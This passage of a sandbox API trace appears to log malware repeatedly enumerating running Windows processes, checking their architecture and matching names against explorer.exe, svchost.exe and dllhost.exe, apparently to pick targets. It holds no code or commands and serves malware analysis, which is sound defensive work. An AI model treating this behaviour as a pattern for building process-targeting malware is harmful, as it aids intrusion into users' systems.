cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0183.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0183.127] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.127] CloseHandle (hObject=0xd8) returned 1 [0183.128] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0183.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0183.128] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.128] CloseHandle (hObject=0xd8) returned 1 [0183.128] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0183.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0183.129] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.129] CloseHandle (hObject=0xd8) returned 1 [0183.129] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0183.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0183.129] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.129] CloseHandle (hObject=0xd8) returned 1 [0183.129] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0183.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0183.130] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.130] CloseHandle (hObject=0xd8) returned 1 [0183.130] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0183.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0183.130] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.130] CloseHandle (hObject=0xd8) returned 1 [0183.131] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0183.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0183.131] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.131] CloseHandle (hObject=0xd8) returned 1 [0183.131] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0183.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0183.132] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.132] CloseHandle (hObject=0xd8) returned 1 [0183.132] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0183.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0183.132] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.132] CloseHandle (hObject=0xd8) returned 1 [0183.132] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0183.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0183.133] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.133] CloseHandle (hObject=0xd8) returned 1 [0183.133] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0183.133] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0183.134] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0183.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0183.134] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0183.135] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0183.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0183.135] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0183.136] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0183.136] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.136] CloseHandle (hObject=0xd8) returned 1 [0183.136] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0183.136] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0183.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0183.147] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.147] CloseHandle (hObject=0xd8) returned 1 [0183.147] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0183.147] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0183.147] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0183.147] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0183.148] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0183.149] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.149] CloseHandle (hObject=0xd8) returned 1 [0183.149] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0183.149] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.149] CloseHandle (hObject=0xd8) returned 1 [0183.149] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0183.149] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0183.150] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.150] CloseHandle (hObject=0xd8) returned 1 [0183.150] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.150] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0183.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0183.151] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0183.151] CloseHandle (hObject=0xd8) returned 1 [0183.151] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0183.151] CloseHandle (hObject=0xd4) returned 1 [0183.152] Sleep (dwMilliseconds=0x3e8) [0184.151] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0184.153] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0184.153] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0184.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0184.154] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0184.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0184.154] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0184.155] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0184.155] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0184.156] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0184.156] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0184.157] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0184.157] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0184.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0184.158] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0184.158] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0184.159] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0184.159] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0184.160] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0184.160] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0184.161] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0184.161] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0184.162] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0184.162] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.163] CloseHandle (hObject=0xd8) returned 1 [0184.163] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0184.163] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0184.163] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0184.163] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0184.163] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0184.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0184.164] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.164] CloseHandle (hObject=0xd8) returned 1 [0184.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0184.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0184.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0184.164] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0184.164] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0184.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0184.165] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0184.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0184.165] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.165] CloseHandle (hObject=0xd8) returned 1 [0184.165] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0184.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0184.166] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.166] CloseHandle (hObject=0xd8) returned 1 [0184.166] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0184.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0184.166] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.166] CloseHandle (hObject=0xd8) returned 1 [0184.167] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0184.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0184.167] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.167] CloseHandle (hObject=0xd8) returned 1 [0184.167] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0184.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0184.168] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.168] CloseHandle (hObject=0xd8) returned 1 [0184.168] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 